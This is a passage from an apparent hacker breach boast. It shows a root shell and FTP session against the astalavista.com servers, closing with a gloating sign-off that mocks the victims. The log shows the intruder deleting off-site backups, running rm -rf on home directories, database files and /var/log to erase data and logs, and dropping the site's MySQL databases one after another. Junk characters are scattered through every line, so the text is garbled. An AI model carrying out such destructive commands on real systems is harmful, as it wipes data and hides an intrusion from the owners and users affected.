0 k- P) A, _3 s* x& I7 p8 U226 Transfer complete.
; E! u) Z: @7 Xftp> cd astalavista.com, x/ U m! Y& ? L. W# q4 ]: N
250 CWD command successful.
* f4 S" ?: L8 f5 ^ftp> ls -la. v$ G* I/ i9 G6 T* H8 I
227 Entering Passive Mode (212,254,194,163,2,189)
1 h' t) j8 a$ B, l/ S150 Opening BINARY mode data connection for ‘file list’.* j- F- g8 y$ ~7 u5 ~
-rw-rw-rw- 1 astalavista.com users 23410936878 Apr 29 22:10 09-04-28-astacom_full.tar( A- X& f" R+ S; W; t/ x
-rw-rw-rw- 1 astalavista.com users 20617651590 Apr 29 14:18 09-04-28-astacom_full.tar.bz2+ \5 E( ^& _3 d3 ]( G
-rw-rw-rw- 1 astalavista.com users 88287111 Apr 29 15:57 09-04-29-astacom_sql_full.sql.tar.bz2
& g$ G+ S( J' ^3 T-rw-rw-rw- 1 astalavista.com users 26413034040 May 2 00:21 09-05-01-astacom-Public_HTML.tar) s. G* F, Y3 j* I M
-rw-rw-rw- 1 astalavista.com users 277843549 May 1 17:29 09-05-01-astacom-SQL_Dump.tar g3 v* a6 x. | g
[snip] G1 N P5 q9 h+ u
226 Transfer complete.
' V% h" ~' V8 [' M% [ftp> mdelete * J0 z8 L/ ?2 Q1 ?- Y
ftp> ls -la2 }9 {% z- O& h1 _4 I3 R
227 Entering Passive Mode (212,254,194,163,2,193)
* _, l m9 G: E) w* O& u( Z150 Opening BINARY mode data connection for ‘file list’.
& o7 p R" r$ [3 H( Q226 Transfer complete.7 W2 P9 o7 Z) b; k1 d3 U2 [& q6 P2 c
ftp>
9 G9 V8 l9 {& f! ^( N6 x+ `; ?1 }
2 u3 m% K1 w3 T& Lsh-3.2# cd /home
: s. g9 _, `- y( s: fsh-3.2# ls -la) [+ v% \( ~ h$ y0 h' A8 U
total 120
# {2 }. B9 y) Z Bdrwxr-xr-x 14 root root 4096 Mar 11 17:56 .
6 K* d* \5 c9 c0 {: sdrwxr-xr-x 25 root root 4096 Jun 3 02:43 ..
6 H0 l$ y, W- Fdrwx–x–x 9 admin admin 4096 Nov 28 2007 admin
, Q8 e1 Y0 {2 P- u0 g$ J1 d: W% C-rw——- 1 root root 8192 Jun 4 03:03 aquota.group
& o! [$ p8 N3 k, u- r-rw——- 1 root root 8192 Jun 3 02:45 aquota.user
3 K* }8 I: ^# L( ]+ l1 Gdrwx–x–x 6 astanet astanet 4096 Jun 4 09:51 astanet
. n# U; o4 a* K" L8 fdrwxr-xr-x 2 root root 4096 Jul 29 2008 backup
% w/ R. j7 P8 u& P9 L6 Mdrwxr-xr-x 2 root root 4096 Sep 17 2008 backup.14161& g8 y1 z1 \: m3 V- K$ f
drwx–x–x 10 com com 4096 Apr 28 12:40 com
7 j- v+ T4 ?- P9 ^ i. adrwxr-xr-x 2 root root 4096 May 17 2007 ftp
. m# M# B5 s) F* U' ~, N% Hdrwx—— 3 jon jon 4096 Sep 21 2007 jon+ E6 W6 q4 e9 N! M4 v7 ?; _+ z
drwx—— 2 root root 16384 Sep 11 2007 lost+found; s/ t7 A& f) H: U3 P
drwxr-xr-x 2 root root 4096 Sep 14 2007 my
9 K! K R4 a& w* Ldrwxr-xr-x 5 mysql mysql 4096 Sep 24 2007 mysqldata( D1 _+ l" R; \: }- |
drwx—— 2 jon jon 4096 Sep 15 2007 test ]: B5 m/ w- |. D. E
drwxrwxrwt 2 root root 4096 Jul 29 2008 tmp# Y# K5 k# v2 m" O: S
7 L3 ~+ p! \3 }1 r# L% U8 Fsh-3.2# rm -rf backup/4 n% y- E( S' [/ r8 q/ C8 b* B
sh-3.2# rm -rf backup.14161/
5 g: b( o- ]* m7 Y e! h' Gsh-3.2# rm -rf ftp/
3 M4 O! ^* z4 Q7 S9 `; g3 P5 K0 tsh-3.2# rm -rf jon/, J/ S H$ L5 S; T% b x, _7 h
sh-3.2# rm -rf my/, n" a! v& d: v; N5 d5 v# {9 O M- b
sh-3.2# rm -rf mysqldata/
! v* ^7 [8 W1 Ysh-3.2# rm -rf test/0 a1 L1 Q6 W( t3 q& Q2 n) ]
sh-3.2# rm -rf tmp/
- Q/ \7 v8 |& r; U4 K. |sh-3.2# cd ~
3 F3 r }( {* q8 k! Fsh-3.2# rm -rf *
: u6 v: t% Y/ Q! h4 wsh-3.2# rm -rf /var/log/& J* d3 h4 R# f+ i' L3 W
rm: cannot remove directory `/var/log//proftpd’: Directory not empty) z& N$ F" a% W& F9 ~9 x
sh-3.2# rm -rf /home/*
. d+ y6 |# {9 p9 E$ Bsh-3.2# mysql/ q0 J! _0 R, q. B2 D% I! G
Welcome to the MySQL monitor. Commands end with ; or \g.$ C, A4 h/ T3 ]& ?7 ]# ~1 Y/ M) S
Your MySQL connection id is 4071568 c L& t, ]6 W2 v3 j3 @
Server version: 5.0.45-community-log MySQL Community Edition (GPL)
" N0 w" z2 @5 o" }7 R0 @3 h9 t) z' x
Type ‘help;’ or ‘\h’ for help. Type ‘\c’ to clear the buffer.* |. I" D7 d% ~2 b
- H; H" a& x' b) H; \mysql> show databases;3 v3 x' }: O6 y* [* G8 }6 i. E* G
+———————–+ q( }' I" v& Y- o$ |0 \
| Database |
7 Z* x" S( u C( z0 L: z/ w9 E+———————–+1 n9 `! I: R- |0 Y
| information_schema |
% X- @; U( e2 i9 T8 z4 f" K* X| astanet_ads | y4 {& H2 R5 U }6 T, z2 Z
| astanet_mailing_lists |* c7 n% w G/ b1 Z
| astanet_mediawiki |
$ k8 y: \' I4 }# ?3 Q o* l5 E| astanet_membersystem |
0 {- s9 h o1 x# ]$ w| com_contrexx |2 Q: \0 ^6 y( y }8 e" H
| com_contrexx2 |
$ k& K4 B7 j2 P: T1 O% |4 [1 Z| com_contrexx2_live |" }6 n4 o5 U6 m2 `
| da_roundcube |
a8 S) X" @! b| dolphin |
9 }. a4 v M3 m! l b| ideapool | P1 Y0 f& I4 }& M% {' l- v
| mysql |4 t0 e8 Q1 G5 h6 s
| test |
8 D% S$ n2 N8 W* ~* v| yourmaster |
& Z3 c5 o/ v/ L' r( K2 E6 Q+———————–+
! w9 P9 H3 R- Q. m: D14 rows in set (0.03 sec)- q2 k: S5 r. e) t9 y
$ q) t5 {) Q, F* @mysql> drop database astanet_membersystem;
, ?0 A8 n6 _7 q$ H1 j$ ?; FdroQuery OK, 46 rows affected (0.81 sec)3 K: f6 v% u1 C4 U0 b
/ y, G5 T7 \( `- ~) Bmysql> drop database com_contrexx;
' t% b2 m* T7 CQuery OK, 211 rows affected (2.72 sec)
- s: L+ Y- O% s& h4 h0 n8 e' [$ I3 K3 g
mysql> drop database com_contrexx2;8 }- C! n( S" a4 G4 j' ^
Query OK, 237 rows affected (2.23 sec)
+ O4 r- {4 e- i( ^4 l' n6 T
9 }- [% s) o7 [9 ]2 r% hmysql> drop database com_contrexx2_live;3 M" `7 Q/ o$ I6 j4 m
Query OK, 227 rows affected (7.63 sec)8 \" n0 ~4 ^. I6 y! b
& X9 ^* ^# A# I# [7 o* _& T/ Kmysql> drop database ideapool;4 J- C# u0 s) C) {" k1 o
Query OK, 69 rows affected (0.19 sec)
6 _) j4 ^, }0 x& W4 x. u m. g* I, _+ e# o7 p% K; Z8 a3 ^
mysql> drop database yourmaster;, U$ Z3 l) Z, F
Query OK, 158 rows affected (0.55 sec)
3 |8 k- L, o, |4 t9 l3 M
0 @. U1 T0 k* r Pmysql> drop database astanet_ads;
8 J+ l' ~- }1 O8 x, |% zQuery OK, 9 rows affected (0.11 sec)
5 e. ~- _7 L v& y) \2 P2 h' y- T) r' n) P( r
mysql> drop database astanet_mailing_lists;
% T v g8 i" W6 S7 IQuery OK, 24 rows affected (1.47 sec)6 p4 W0 X. g8 F L# F9 c5 @" g
& W0 }# j% x" P. |4 ?mysql> drop database astanet_mediawiki;
9 R2 E9 G6 l3 t$ E3 s5 U- ?Query OK, 31 rows affected (0.51 sec)/ x' c; m! B$ ]+ C% q1 p0 S0 I
/ A) G/ e c, k( v# [2 [
mysql> show databases;
) E- G. B2 d/ D# p9 Z+——————–+
9 N4 w: q6 O8 N| Database |8 k) @# q! q$ T) C
+——————–+
' J f7 N o8 |+ j: k| information_schema |' F. [8 i* O( G1 y P
| da_roundcube |
. V! _9 b8 A+ j# [| dolphin |7 }/ {; f7 {) d4 C
| mysql |
0 @( V7 r! z- @9 w- O* ~| test |6 p1 c6 B0 D# c5 x
+——————–+
7 ~* X+ c5 J+ L7 r i5 rows in set (0.00 sec)7 B+ m& w& r' X" R) t
, _! L6 a! u5 n, h! ?7 Z
What a journey! We’re not sure exactly why the “Terminator” had any influence on" |& R4 J) z; J) l
their naming (conventions) but we’re sure Arnold himself wouldn’t be in the9 {8 d* ^; ]. w- O& i9 K
wrong to say this pack of morons *wont be back*.2 `1 R% g- F' K# o4 r& E
|